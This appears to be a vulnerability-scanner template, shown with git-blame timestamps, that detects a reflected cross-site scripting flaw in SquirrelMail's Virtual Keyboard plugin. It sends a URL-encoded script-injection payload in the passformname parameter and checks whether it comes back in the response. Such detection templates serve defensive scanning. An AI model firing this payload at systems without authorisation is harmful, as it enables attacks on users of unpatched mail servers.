2021-11-15 18:28:18 +00:00
id : squirrelmail-vkeyboard-xss
info :
name : SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting
author : dhiyaneshDk
severity : medium
description : The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/34814
2022-08-27 04:41:18 +00:00
tags : xss,squirrelmail,plugin,edb
2021-11-15 18:28:18 +00:00
requests :
- method : GET
path :
2021-11-16 09:43:47 +00:00
- '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-11-15 18:28:18 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2021-11-16 09:43:47 +00:00
- "</script><script>alert(document.domain)</script>"
2021-11-15 18:28:18 +00:00
part : body
- type : word
words :
- "text/html"
part : header